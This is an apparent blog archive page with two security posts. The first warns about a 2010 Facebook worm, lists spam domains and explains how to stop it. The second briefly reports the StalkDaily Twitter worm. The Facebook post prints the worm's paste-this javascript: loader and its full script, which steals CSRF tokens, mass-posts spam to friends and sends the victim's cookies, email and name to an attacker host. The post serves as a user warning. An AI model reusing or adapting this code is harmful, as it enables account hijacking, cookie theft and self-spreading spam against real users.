Archive

Posts Tagged ‘spam’

Facebook Spam – Status Message

November 29th, 2010 12 comments
You get a wall post by some of your friend saying some revolving image , new theme thing is out view the link to enjoy it
you open that site …the site asks you to copy some JavaScript code like …
javascript:(a = (b = document).createElement(“script”)).src = “//imaginemonkeys.com/majic.js?show”, b.body.appendChild(a); void(0)
and when you post it in your Facebook account Address bar…thats it you start spamming .. and the Fire keeps increasing ..
Some of the DOMAINS you should not visit if you see in a post :
http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/
New domains keep coming ….
HOW TO STOP IT ?
To stop it spamming to your wall simply re-generate your mobile email unique address at http://www.facebook.com/mobile/ clean out your cookies and don’t be copy/pasting javascript into your browser again!
The Script which runs inside the JS(which is mostly majic.js or the index.php file is :
// script name : whitebeard
// author : orkut.com/Community.aspx?cmm=43558952
txt = “Checkout 360 rotate effect on images. MUST SEEĀ http://revolvingimages.info/fb/”;
txtee = “Checkout 360 revolve effect on images. MUST SEEĀ http://revolvingimages.info/fb/”;

alert(“Please wait 2-3 mins while we setup! Do not refresh this window or click any link.”);

with(x = new XMLHttpRequest())
open(“GET”, “/”), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\”composer_id\\” value=\\”([\d\w]+)\\”/i)[1];
form = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
dt = z.match(/name=”fb_dtsg” value=”([\d\w-_]+)”/i)[1];
pfid = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
appid = “150622878317085″;
appname = “rip_m_j”;

with(xx = new XMLHttpRequest())
open(“GET”, “/ajax/browser/friends/?uid=” + document.cookie.match(/c_user=(\d+)/)[1] + “&filter=all&__a=1&__d=1″),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join(“\n”).replace(/(\/\d+_|_\d+_q\.jpg)/gi, “”).split(“\n”);
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open(“GET”, “/ajax/pages/dialog/manage_pages.php?__a=1&__d=1″),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\”id\\”:([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(lllllxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(llxlxlxlxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
} else if (i == llimit – 1) {
with(xxxx = new XMLHttpRequest()) open(“GET”, “/mobile/?v=photos”),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement(“script”)) src = “http://revolvingimages.info/majic.js?q=” + document.cookie.match(/c_user=(\d+)/)[1] + “:” + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, “@”) + “:” + d.match(/id=”navAccountName”>([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txt + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
else {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txtee + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);

Also one Application which is just popping up as Profile Privacy v1.2 is a FAKE APPLICATION and use such comments on other users wall:

OMG OMG OMG… I cant believe this actually works! Now you really can see who viewed your profile! on http://bit.ly/9rVvrN

—Updated—-

How to reset your dedicated/mobile email address?

Many people asked me how to reset mobile email address mentioned at http://facebook.com/mobile. You can do this by visiting your wall, and click on add photo.

There select upload from disk, and there you will see option “upload via email”, click on it. There will be an option “refresh your upload email.”, click on that and it will generate new mobile email address.

Categories: Security, Tech News Tags: , , , , , , ,

Worm infiltrates Twitter

April 26th, 2009 No comments

A worm apparently infected Twitter on Saturday.

The worm may originate with the StalkDaily.com site, and Twitter warned people against visiting the site or linking to it.

“If you have been locked out of your acct due to the StalkDaily issue, pls do a p/w reset; we may have reset your p/w for safety,” Twitter informed its users on Saturday afternoon.

Details about the worm itself were scarce, but the micro-blogging site was awash in the news by Saturday night. “StalkDaily Worm Runs,” “#stalksdaily,” and “Twitter hit by” were the No. 2, 3, and 5 top topics at that time.

According to a TechCrunch report, visiting the profile page of an infected user can lead to one’s own profile getting infected. The worm also apparently sends spam tweets from the infected person’s account that direct others to the StalkDaily site.

The worm apparently hit in the morning, according to Twitter, and then had a resurgence in the afternoon.

StalkDaily’s site states that it has nothing to do with the attacks, according to TechCrunch. But that statement apparently is being taken with a grain of salt.

Read more…

Categories: Tech News Tags: , , , , , , , , , , , , , ,